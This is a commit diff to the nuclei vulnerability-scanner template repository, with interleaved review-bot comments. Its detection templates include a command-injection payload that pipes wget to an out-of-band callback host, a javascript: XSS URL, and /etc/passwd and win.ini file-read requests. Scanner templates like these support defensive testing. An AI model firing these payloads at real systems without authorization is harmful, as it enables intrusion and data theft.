patch-1
sandeep 2022-02-27 21:30:55 +05:30
commit bd50655a13
87 changed files with 2410 additions and 1639 deletions


@ -35,6 +35,7 @@ jobs:
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git pull
git add cves
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
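Review bot: The new `git pull` sits after the step that regenerates `cves` (that step is outside the hunk, so this is inferred), which means the working tree is presumably already dirty when the pull runs; a plain `git pull` refuses to merge over uncommitted changes to files the remote also touched, so the job would abort before the `git commit` line is reached. If the intent is only to pick up commits that landed while the job ran, `git pull --rebase --autostash` keeps the local edits and avoids a merge commit in the automated history; `git pull --ff-only` is the stricter alternative if a non-fast-forward should fail loudly. The enclosing `run: |` step and the `jobs:` block continue outside the hunk.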


@ -26,5 +26,4 @@ jobs:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog
generate-index -mode templates


@ -1,169 +1,14 @@
cves/2009/CVE-2009-5020.yaml
cves/2012/CVE-2012-4547.yaml
cves/2013/CVE-2013-7091.yaml
cves/2016/CVE-2016-10940.yaml
cves/2016/CVE-2016-3978.yaml
cves/2018/CVE-2018-1000226.yaml
cves/2018/CVE-2018-18925.yaml
cves/2018/CVE-2018-7602.yaml
cves/2019/CVE-2019-1010290.yaml
cves/2019/CVE-2019-10758.yaml
cves/2019/CVE-2019-13396.yaml
cves/2019/CVE-2019-3911.yaml
cves/2019/CVE-2019-3912.yaml
cves/2020/CVE-2020-12447.yaml
cves/2020/CVE-2020-18268.yaml
cves/2020/CVE-2020-24391.yaml
cves/2020/CVE-2020-25864.yaml
cves/2020/CVE-2020-35749.yaml
cves/2020/CVE-2020-36365.yaml
cves/2021/CVE-2021-20150.yaml
cves/2021/CVE-2021-20158.yaml
cves/2021/CVE-2021-20792.yaml
cves/2021/CVE-2021-21973.yaml
cves/2021/CVE-2021-24300.yaml
cves/2021/CVE-2021-24488.yaml
cves/2021/CVE-2021-24510.yaml
cves/2021/CVE-2021-24750.yaml
cves/2021/CVE-2021-24838.yaml
cves/2021/CVE-2021-24926.yaml
cves/2021/CVE-2021-24947.yaml
cves/2021/CVE-2021-24991.yaml
cves/2021/CVE-2021-25008.yaml
cves/2021/CVE-2021-25028.yaml
cves/2021/CVE-2021-25052.yaml
cves/2021/CVE-2021-25063.yaml
cves/2021/CVE-2021-25074.yaml
cves/2021/CVE-2021-25864.yaml
cves/2021/CVE-2021-26247.yaml
cves/2021/CVE-2021-32682.yaml
cves/2021/CVE-2021-32853.yaml
cves/2021/CVE-2021-3293.yaml
cves/2021/CVE-2021-34640.yaml
cves/2021/CVE-2021-34643.yaml
cves/2021/CVE-2021-39322.yaml
cves/2021/CVE-2021-39350.yaml
cves/2021/CVE-2021-39433.yaml
cves/2021/CVE-2021-40323.yaml
cves/2021/CVE-2021-43062.yaml
cves/2021/CVE-2021-43810.yaml
cves/2021/CVE-2021-45380.yaml
cves/2021/CVE-2021-46005.yaml
cves/2022/CVE-2022-0149.yaml
cves/2022/CVE-2022-0218.yaml
cves/2022/CVE-2022-0281.yaml
cves/2022/CVE-2022-0378.yaml
cves/2022/CVE-2022-0432.yaml
cves/2022/CVE-2022-0653.yaml
cves/2022/CVE-2022-23178.yaml
cves/2022/CVE-2022-23808.yaml
cves/2022/CVE-2022-23944.yaml
cves/2022/CVE-2022-24112.yaml
cves/2022/CVE-2022-25323.yaml
default-logins/cobbler/cobbler-default-login.yaml
default-logins/gophish/gophish-default-login.yaml
default-logins/huawei/huawei-HG532e-default-router-login.yaml
default-logins/jboss/jmx-default-login.yaml
default-logins/mofi/mofi4500-default-login.yaml
default-logins/netsus/netsus-default-login.yaml
default-logins/versa/versa-default-login.yaml
default-logins/xerox/xerox7-default-login.yaml
exposed-panels/alfresco-detect.yaml
exposed-panels/atvise-login.yaml
exposed-panels/bigbluebutton-login.yaml
exposed-panels/cisco/cisco-ucs-kvm-login.yaml
exposed-panels/cobbler-webgui.yaml
exposed-panels/code42-panel.yaml
exposed-panels/concrete5/concrete5-install.yaml
exposed-panels/concrete5/concrete5-panel.yaml
exposed-panels/ecosys-command-center.yaml
exposed-panels/flightpath-panel.yaml
exposed-panels/gophish-login.yaml
exposed-panels/hashicorp-consul-agent.yaml
exposed-panels/hashicorp-consul-webgui.yaml
exposed-panels/jamf-panel.yaml
exposed-panels/netdata-dashboard-detected.yaml
exposed-panels/netsus-server-login.yaml
exposed-panels/openbmcs-detect.yaml
exposed-panels/otobo-panel.yaml
exposed-panels/projectsend-login.yaml
exposed-panels/pypicloud-panel.yaml
exposed-panels/qualcomm-voip-router.yaml
exposed-panels/seeddms-panel.yaml
exposed-panels/strapi-documentation.yaml
exposed-panels/submitty-login.yaml
exposed-panels/teltonika-login.yaml
exposed-panels/terraform-enterprise-panel.yaml
exposed-panels/threatq-login.yaml
exposed-panels/trendnet/trendnet-tew827dru-login.yaml
exposed-panels/typo3-login.yaml
exposed-panels/unauth-xproxy-dashboard.yaml
exposed-panels/versa-sdwan.yaml
exposed-panels/voipmonitor-panel.yaml
exposed-panels/wallix-accessmanager-panel.yaml
exposed-panels/wazuh-panel.yaml
exposed-panels/webmodule-ee-panel.yaml
exposed-panels/xxljob-panel.yaml
exposed-panels/zblogphp-panel.yaml
misconfiguration/caddy-open-redirect.yaml
misconfiguration/cobbler-exposed-directory.yaml
misconfiguration/misconfigured-concrete5.yaml
misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
misconfiguration/openbmcs/openbmcs-ssrf.yaml
ssl/deprecated-tls.yaml
takeovers/gitbook-takeover.yaml
takeovers/short-io.yaml
technologies/airtame-device-detect.yaml
technologies/apollo-server-detect.yaml
technologies/appcms-detect.yaml
technologies/cobbler-version.yaml
technologies/erxes-detect.yaml
technologies/gnuboard-detect.yaml
technologies/interactsh-server.yaml
technologies/lexmark-detect.yaml
technologies/metatag-cms.yaml
technologies/projectsend-detect.yaml
technologies/roundcube-webmail-portal.yaml
technologies/smartstore-detect.yaml
technologies/typo3-detect.yaml
technologies/web-suite-detect.yaml
technologies/zerof-webserver-detect.yaml
vulnerabilities/gitlab/gitlab-rce.yaml
vulnerabilities/jamf/jamf-blind-xxe.yaml
vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
vulnerabilities/joomla/rusty-joomla.yaml
vulnerabilities/laravel/laravel-ignition-xss.yaml
vulnerabilities/other/antsword-backdoor.yaml
vulnerabilities/other/goip-1-lfi.yaml
vulnerabilities/other/java-melody-xss.yaml
vulnerabilities/other/kyocera-m2035dn-lfi.yaml
vulnerabilities/other/otobo-open-redirect.yaml
vulnerabilities/other/pollbot-redirect.yaml
vulnerabilities/other/yishaadmin-lfi.yaml
vulnerabilities/ransomware/deadbolt-ransomware.yaml
vulnerabilities/wordpress/accessibility-helper-xss.yaml
vulnerabilities/wordpress/candidate-application-lfi.yaml
vulnerabilities/wordpress/cherry-lfi.yaml
vulnerabilities/wordpress/churchope-lfi.yaml
vulnerabilities/wordpress/db-backup-lfi.yaml
vulnerabilities/wordpress/easy-social-feed.yaml
vulnerabilities/wordpress/elementorpage-open-redirect.yaml
vulnerabilities/wordpress/elex-woocommerce-xss.yaml
vulnerabilities/wordpress/feedwordpress-xss.yaml
vulnerabilities/wordpress/hb-audio-lfi.yaml
vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml
vulnerabilities/wordpress/mthemeunus-lfi.yaml
vulnerabilities/wordpress/music-store-open-redirect.yaml
vulnerabilities/wordpress/my-chatbot-xss.yaml
vulnerabilities/wordpress/newsletter-open-redirect.yaml
vulnerabilities/wordpress/ninjaform-open-redirect.yaml
vulnerabilities/wordpress/noptin-open-redirect.yaml
vulnerabilities/wordpress/shortcode-lfi.yaml
vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
vulnerabilities/wordpress/sniplets-lfi.yaml
vulnerabilities/wordpress/sniplets-xss.yaml
vulnerabilities/wordpress/wp-code-snippets-xss.yaml
vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
vulnerabilities/wordpress/wp-whmcs-xss.yaml
workflows/concrete-workflow.yaml
workflows/gophish-workflow.yaml
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cves/2017/CVE-2017-18598.yaml
cves/2019/CVE-2019-9726.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-23134.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
technologies/empirecms-detect.yaml
technologies/snipeit-panel.yaml
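Review bot: The new entry `exposed-panels/phoronix-pane;.yaml` contains a semicolon where `panel` appears intended; every neighbouring addition follows the `<product>-panel.yaml` pattern (`homematic-panel.yaml`, `raspberrymatic-panel.yaml`, `redash-panel.yaml`). I cannot see the template file itself from this page: if it really carries the semicolon it should be renamed, and if it does not, this index line points at a non-existent template. Either way the line should read `exposed-panels/phoronix-panel.yaml`.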


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1012 | daffainfo | 539 | cves | 1018 | info | 1034 | http | 2802 |
| panel | 424 | dhiyaneshdk | 395 | exposed-panels | 425 | high | 764 | file | 57 |
| lfi | 420 | pikpikcu | 300 | vulnerabilities | 406 | medium | 591 | network | 48 |
| xss | 318 | pdteam | 250 | technologies | 214 | critical | 370 | dns | 16 |
| wordpress | 314 | geeknik | 174 | exposures | 199 | low | 173 | | |
| exposure | 274 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 260 | 0x_akoko | 105 | workflows | 184 | | | | |
| cve2021 | 241 | gy741 | 104 | token-spray | 146 | | | | |
| tech | 226 | pussycat0x | 101 | default-logins | 75 | | | | |
| wp-plugin | 222 | princechaddha | 97 | takeovers | 66 | | | | |
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
**221 directories, 3141 files**.
**221 directories, 3173 files**.
</td>
</tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1012 | daffainfo | 539 | cves | 1018 | info | 1034 | http | 2802 |
| panel | 424 | dhiyaneshdk | 395 | exposed-panels | 425 | high | 764 | file | 57 |
| lfi | 420 | pikpikcu | 300 | vulnerabilities | 406 | medium | 591 | network | 48 |
| xss | 318 | pdteam | 250 | technologies | 214 | critical | 370 | dns | 16 |
| wordpress | 314 | geeknik | 174 | exposures | 199 | low | 173 | | |
| exposure | 274 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 260 | 0x_akoko | 105 | workflows | 184 | | | | |
| cve2021 | 241 | gy741 | 104 | token-spray | 146 | | | | |
| tech | 226 | pussycat0x | 101 | default-logins | 75 | | | | |
| wp-plugin | 222 | princechaddha | 97 | takeovers | 66 | | | | |
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |


@ -0,0 +1,24 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform Command Execution
author: daffainfo
severity: critical
reference: http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
tags: ruijie,cnvd,cnvd2021,rce
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php
Host: {{Hostname}}
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
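Review bot: The new template carries no `description` and no `classification` block, even though the CVE templates touched in this commit are being given exactly those fields; CNVD-2021-15824 in the same commit has the same gap. A one-sentence `description:` naming the affected Ruijie EWEB component and the impact that justifies `severity: critical` (unauthenticated command execution, which is what the `ip` parameter payload and the interactsh matcher test for), plus a `classification:` stanza with the matching `cwe-id` (CWE-78 if OS command injection is the confirmed root cause), would bring it in line. The `reference:` here is a single scalar while CNVD-2021-15824 uses a list; both parse, but the list form is the one the rest of the commit converges on.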


@ -0,0 +1,28 @@
id: CNVD-2021-15824
info:
name: EmpireCMS DOM Cross Site-Scripting
author: daffainfo
severity: medium
reference:
- https://www.bilibili.com/read/cv10441910
- https://vul.wangan.com/a/CNVD-2021-15824
tags: empirecms,cnvd,cnvd2021,xss,domxss
requests:
- method: GET
path:
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'if(Request("url")!=0)'
- 'href=\""+Request("url")+"\"'
condition: and
- type: status
status:
- 200


@ -1,10 +1,10 @@
id: CVE-2012-4940
info:
name: Axigen Mail Server - 'Filename' Directory Traversal
name: Axigen Mail Server Filename Directory Traversal
author: dhiyaneshDk
severity: high
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.
reference:
- https://www.exploit-db.com/exploits/37996
- https://nvd.nist.gov/vuln/detail/CVE-2012-4940
@ -28,4 +28,4 @@ requests:
- "extensions"
condition: and
# Enhanced by mp on 2022/02/21
# Enhanced by cs on 2022/02/25


@ -1,12 +1,14 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin
description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
classification:
cve-id: CVE-2013-3526
requests:
- method: GET
@ -28,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23
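Review bot: The rewritten `description:` drops the opening double quote but keeps the closing one, so the value now ends with a literal `"` after `parameter.`; YAML tolerates a `"` inside a plain scalar, so nothing fails to parse and the stray character silently ends up in the published description. Drop the trailing quote so the line reads `description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.` (or quote both ends, as the old line did).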


@ -4,11 +4,14 @@ info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
tags: cve,cve2013,lfi,javafaces,oracle
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
classification:
cve-id: CVE-2013-3827
requests:
- method: GET
@ -36,4 +39,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/23
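Review bot: The rewritten `description:` capitalises `Unspecified` mid-sentence (`An Unspecified vulnerability …`), which is inconsistent with the same edit elsewhere in this commit (CVE-2014-4210 becomes `An unspecified vulnerability …`). Change the opening to `description: An unspecified vulnerability in the Oracle GlassFish Server component …` with the rest unchanged. The `- 200` status line appears twice in the trailing hunk; from the rendered view that looks like a whitespace-only change, which is harmless if so.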


@ -1,12 +1,14 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
tags: cve,cve2013,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2013-4117
requests:
- method: GET
@ -28,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23


@ -1,12 +1,17 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
remediation: Upgrade to Duplicator 0.4.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4625
- https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
tags: cve,cve2013,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2013-4625
requests:
- method: GET
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24


@ -4,9 +4,13 @@ info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference: https://www.exploit-db.com/exploits/40887
description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference:
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
tags: cve,cve2013,lfi,cisco
classification:
cve-id: CVE-2013-5528
requests:
- method: GET
@ -23,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24
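Review bot: The NVD reference added to this template points at `https://nvd.nist.gov/vuln/detail/CVE-2014-3120` (the Elasticsearch issue also touched in this commit), while the template's `cve-id` is CVE-2013-5528 and its tags say `cve2013`. A reader following the link lands on an unrelated advisory, and any tooling that cross-checks references against `cve-id` will flag the mismatch. The line should read `- https://nvd.nist.gov/vuln/detail/CVE-2013-5528`.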


@ -4,12 +4,15 @@ info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/26955
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
tags: cve,cve2013,lfi
classification:
cve-id: CVE-2013-5979
requests:
- method: GET
@ -26,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24


@ -1,15 +1,17 @@
id: CVE-2013-7091
info:
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
author: rubina119
severity: critical
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
- https://www.exploit-db.com/exploits/30085
- https://www.exploit-db.com/exploits/30472
tags: cve,cve2013,zimbra,lfi
classification:
cve-id: CVE-2013-7091
requests:
- method: GET
@ -33,4 +35,6 @@ requests:
- type: regex
regex:
- "root=.*:0:0"
- "root=.*:0:0"
# Enhanced by mp on 2022/02/24


@ -4,10 +4,11 @@ info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
- https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24


@ -4,11 +4,14 @@ info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
tags: cve,cve2014,lfi
classification:
cve-id: CVE-2014-10037
requests:
- method: GET
@ -24,4 +27,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/24


@ -9,6 +9,8 @@ info:
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
severity: high
tags: iot,cve,cve2014,zte
classification:
cve-id: CVE-2014-2321
requests:
- method: GET
@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23


@ -1,9 +1,12 @@
id: CVE-2014-2323
info:
name: Lighttpd 1.4.34 SQL injection and path traversal
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
name: Lighttpd 1.4.34 SQL Injection and Path Traversal
description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2323
- https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
- http://www.lighttpd.net/2014/3/12/1.4.35/
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd,injection
@ -24,3 +27,5 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
# Enhanced by mp on 2022/02/24


@ -4,12 +4,16 @@ info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/33004
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
- https://www.exploit-db.com/exploits/33004
classification:
cve-id: CVE-2014-2383
tags: cve,cve2014,dompdf,lfi
metadata:
win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
unix-payload: "/dompdf.php?input_file=/etc/passwd"
description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."
description: "A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter."
requests:
- method: GET
@ -32,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24


@ -4,11 +4,15 @@ info:
name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
remediation: Upgrade to v4.0 or later.
reference:
- https://www.exploit-db.com/exploits/44687
- https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2014-2908
tags: cve,cve2014,xss,siemens
classification:
cve-id: CVE-2014-2908
requests:
- method: GET
@ -30,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23


@ -1,12 +1,17 @@
id: CVE-2014-2962
info:
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
reference:
- https://www.kb.cert.org/vuls/id/774788
- https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
tags: cve,cve2014,lfi,router,firmware,traversal
classification:
cve-id: CVE-2014-2962
requests:
- method: GET
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23
